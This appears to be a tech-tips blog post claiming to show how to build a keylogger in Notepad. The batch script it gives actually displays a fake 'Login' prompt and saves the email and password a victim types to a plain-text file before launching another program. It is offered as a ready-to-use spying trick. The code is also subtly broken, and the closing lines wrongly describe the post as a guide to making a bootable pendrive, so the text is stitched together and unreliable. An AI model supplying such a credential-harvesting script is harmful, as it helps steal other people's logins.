A keylogger is a type of surveillance software (considered software or spyware) that can record each keystroke you make to a log file, usually encrypted. A keylogger recorder can record instant e-mail, messages, and any vital information you type at any time using your keyboard. Each type of keylogger is dangerous as it can track your activity, record your keystrokes, and record the open websites. By this, an account can be easily hacked by hackers.
These keyloggers can identify your bank account passwords too. These types of keyloggers can also be created with the notepad text editor. Today we’re here with a simple and easy trick How to build a keylogger in notepad.
Yes, this is possible in a simple way that I’ve discussed in the article How to build a keylogger in notepad by following the below steps.
Step 1. First of all, open your notepad.
Step 2. Now in notepad, copy and paste the below code.
[pull_quote_center]
@echo off
colour a
title Login
cls
echo Please Enter your Email Adress And Password
echo.
Echo.
cd “C:\Logs”
set /p user=Username: set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
exit
[/pull_quote_center]
Step 3. Now save this file as Logger.bat on your desktop.
Step 4. Now create a new folder named logs.
Step 5. Cut this folder and paste it into drive C:
Step 6. Now test your file Logger.bat and then after entering the Username and password, open the folder in the C drive and see all saved key logs as a text file created there automatically.
Sep 7. That’s it! You’ve successfully created a keylogger in the notepad.
So above is all about How to make a bootable Pendrive using power ISO. With these steps, you can easily make a bootable Pendrive using power ISO.
//BUT, WAIT…THERE are MORE SIMPLE TIPS & TRICKS, SO BE SURE TO FOLLOW US ON TWITTER & GOOGLE+ or LIKE OUR FAN PAGE FACEBOOK.